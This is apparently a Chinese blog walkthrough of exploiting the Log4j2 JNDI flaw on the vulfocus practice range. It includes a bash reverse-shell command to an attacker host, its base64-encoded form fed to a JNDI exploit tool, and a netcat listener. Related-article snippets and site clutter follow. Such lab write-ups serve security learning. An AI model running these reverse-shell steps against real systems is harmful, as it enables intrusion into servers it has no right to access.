vulfocus-fofa靶场 Log4j2远程命令执行

最新推荐文章于 2024-05-26 12:45:23 发布
最新推荐文章于 2024-05-26 12:45:23 发布
阅读量4.2k 收藏 4
点赞数 1
文章标签: java 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48817799/article/details/122215642
版权

Log4j2远程命令执行

前言

一、Apache Log4j2是什么?

Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。

二、复现步骤

1.工具

工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
下载链接:https://github.com/fangjiuye/jiuye

2.复现过程

1.启用靶场http://vulfocus.fofa.so
1

1
2.进行抓包
1

3.在服务器启动工具
bash -i >& /dev/tcp/ip/1234 0>&1 这条命令需要在https://www.jackson-t.ca/runtime-exec-payloads.html进行编码
在这里插入图片描述

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}-A IP

payload使用下图标记那条(目标环境:在JDK中构建,其trustURLCodebase为false,并且在类路径中具有Tomcat 8+或SpringBoot 1.2.x+):)
在这里插入图片描述并在服务器开启监听
在这里插入图片描述

nc -lvvp 1234

4.在burp进行构造payload
在这里插入图片描述

服务器反shell情况
在这里插入图片描述

5.发现服务器监听无信息返回,进行添加Content-Type头

Content-Type:application/x-www-form-urlencoded

在这里插入图片描述

服务器监听情况,成功反shell
在这里插入图片描述

6.获得flag
在这里插入图片描述

方九夜
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FOFA-攻防挑战
蚁景网安学院
07-07 845
在昨天初尝战果之后,发现今天还有挑战赛,按捺不住躁动的心,又开始了学习。今天主要拿下的是这四个镜像,同时我也会对我了解的漏洞详情做一个具体的分析...
vulfocus.fofa靶场Log4j2远程命令执行2
weixin_48817799的博客
12-29 4975
vulfocus.fofa靶场Log4j2远程命令执行2前言一、靶场复现总结 前言 名称: ghcr.io/christophetd/log4shell-vulnerable-app:latest 描述: log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 一、靶场复现 工具:JNDIExploit-1.3-SNAPSHOT.jar 1.打开靶场http://vulfocus.fofa.so 2.使用vps启动工具 java -jar JNDIExploit-1.3.
log4j2远程代码执行
最新发布
2302_79885863的博客
05-26 881
漏洞,黑客可以恶意构造特殊数据请求包,触发此漏洞,从而成功利用此漏洞可以在目标服务器上执行任意代码。注意,此漏洞是可以执行任意代码,这就很恐怖,相当于黑客已经攻入计算机,可以为所欲为了,就像已经进入你家,想干什么,就干什么,比如运行什么程序,植入什么病毒。通过访问那个域名网站之后,它的这个服务器后面会去做一个映射,如果这个网站存在这个漏洞,那么它就会访问这个网站, 只要一访问这个网站它就会得到网站的ip地址,说明我的服务器解析了这个代码,说明那个我的这个网站存在这个漏洞。
vulfocus-fofa靶场 Log4j2远程命令执行复现
weixin_48817022的博客
12-31 4942
Log4j2远程命令执行复现 文章目录Log4j2远程命令执行复现前言一、Apache Log4j2漏洞描述二、复现环境01.工具02.漏洞验证过程03.反弹shell总结 前言 一、Apache Log4j2漏洞描述 描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的
vulfocus靶场搭建(docker环境)
cute_phoebe的博客
06-22 7249
vulfocus涵盖众多类型的漏洞,是个练手的好地方
vulfocus复现:Log4j2远程命令执行(CVE-2021-44228)
m0_71518346的博客
12-17 737
富的特性。该日志框架被大量用于业务Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
**文章标题:**深入解析CVE-2020-24581:D-Link DSL-2888A远程命令执行漏洞 **文章正文:** D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全...
渗透字典-fofa测绘语句
02-08
在使用fofa搜索引擎时一些常用的搜索语句。
Fofa-gui fofa快速采集工具
01-19
【标题】"Fofa-gui fofa快速采集工具"是针对网络安全研究和学习的专业工具,主要用于数据抓取和信息收集。Fofa-gui是该工具的图形化界面版本,使得用户能够更加直观、便捷地操作fofa的搜索功能。 【描述】"仅供学习...
fofa-tool FOFA api查询工具复活版
11-22
2、自动分页,每页500条,最大10000条(根据Fofa的会员等级会有所不同) 3、支持导出scv文件 说明:fofa_tool 官网更新了域名,导致原有的工具失效。重新修改了工具中的域名,让工具重新复活可用。 运行环境:需...
Fofa-collect:Fofa平台采集工具
05-01
Fofa-collectV3.0支持jdk8直接运行jdk11因为没有javafx这个依赖需要自己再加上参数java -Dfile.encoding="UTF-8" --module-path "C:\Program Files\Java\javafx-sdk-11.0.2\lib" --add-modules "javafx.controls,...
Fofax工具使用详细(一)】
qq_55213436的博客
06-11 3818
目录前言安装使用语法查询参数查询 编写语法规则FoFaX 是一款使用 Go 编写的命令FoFa 查询工具,在支持 FoFa 查询规则上增加了 Fx 语法来方便使用者编写自己的规则,并且内置了一些常用的规则,除此之外还有联动其他安全产品在内的其他多个实用功能。主要的功能有:基本 FoFa 语法查询、联动其他安全工具、内置大量 FoFa 规则、Icon Hash 本地/在线计算查询、URL 证书计算查询、排除国内资产。除此之外还可以自定义 Fx 语法查询。......
vulfocus靶场搭建
2301_79773660的博客
06-20 91
拉取镜像vulfocus docker pull vulfocus/vulfocus:latest 创建vulfocus容器 docker create -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=172.17.0.1 vulfocus/vulfocus 各个参数的简单解释: -p :前边的端口代表物理机的端口...
最详细的Log4j使用教程
Code_LT的博客
07-08 3660
其实您也可以完全不使用配置文件,而是在代码中配置Log4j环境。但是,使用配置文件将使您的应用程序更加灵活。Log4j支持两种配置文件格式,一种是XML格式的文件,一种是Java特性文件(键=值)。下面我们介绍使用Java特性文件做为配置文件的方法:其中,level 是日志记录的优先级,分为OFF、FATAL、ERROR、WARN、INFO、DEBUG、ALL或者您定义的级别。Log4j建议只使用四个级别,优 先级从高到低分别是ERROR、WARN、INFO、DEBUG。
Log4j2远程命令执行复现
qq_18811919的博客
04-04 545
本篇文章讲解了Log4j2的常见利用手法,该漏洞影响的范围非常大在护网中经常会使用重大漏洞Get WebShell后续攻击内网横向移动拿到靶标,后续我会推出李同学红队仿真靶场尽可能的还原护网场景感兴趣的朋友关注下。
vulfocus复现:Log4j2远程命令执行2
woai_zhongguo的博客
07-15 743
Log4j2远程命令执行2复现过程
Log4j2远程命令执行2-vulfocus-wp
miojjnum的博客
12-22 3695
vulfocuslog4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 1、首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境: 输入命令开启监听: java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的vps的IP地址 -l 7000 -p 5000 2、bp抓包伺候 ...
log4j2远程代码执行漏洞原理与漏洞复现
人若无名,便可专心练剑
03-20 1748
在看我写的log4j2远程代码执行漏洞之前,师傅们可以看看我前面写的《JNDI注入原理及利用IDEA漏洞复现》这篇文章,因为log4j2远程代码执行漏洞里面有讲JNDI注入,这样可以对师傅的理解更加深刻也更加容易理解!
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 9817
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
fofa-collect怎么安装
10-01
Fofa-collect是一款用于fofa(一个专门用于搜索互联网开放设备的搜索引擎)数据收集的工具。下面是Fofa-collect的安装步骤: 第一步:安装Python 首先,你需要安装Python。你可以从Python官方网站下载合适的Python版本,并按照指示进行安装。确保将Python的路径添加到系统环境变量中。 第二步:安装依赖库 在安装Fofa-collect之前,你需要安装一些依赖库。打开终端或命令提示符窗口,使用pip命令安装所需的库: ``` pip install requests pip install jsonpath pip install termcolor ``` 第三步:下载并安装Fofa-collect 在Github上搜索“fofa-collect”,找到它的仓库,将代码下载到本地。你可以选择使用Git命令行工具进行下载,也可以直接下载ZIP压缩包并解压。 第四步:配置Fofa API 在Fofa的官方网站上注册并登录,获取到API的key。然后,在Fofa-collect的代码文件中找到并修改"config.py"文件,将获取到的API key填入到相应的位置。 第五步:运行Fofa-collect 在终端或命令提示符窗口中,切换到Fofa-collect代码所在的目录,运行以下命令来启动Fofa-collect: ``` python fofa-collect.py ``` 现在,你已经成功安装和运行了Fofa-collect。你可以根据实际需求来使用这个工具进行数据收集和分析。需要注意的是,合法合规的使用和遵守Fofa服务的条款是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值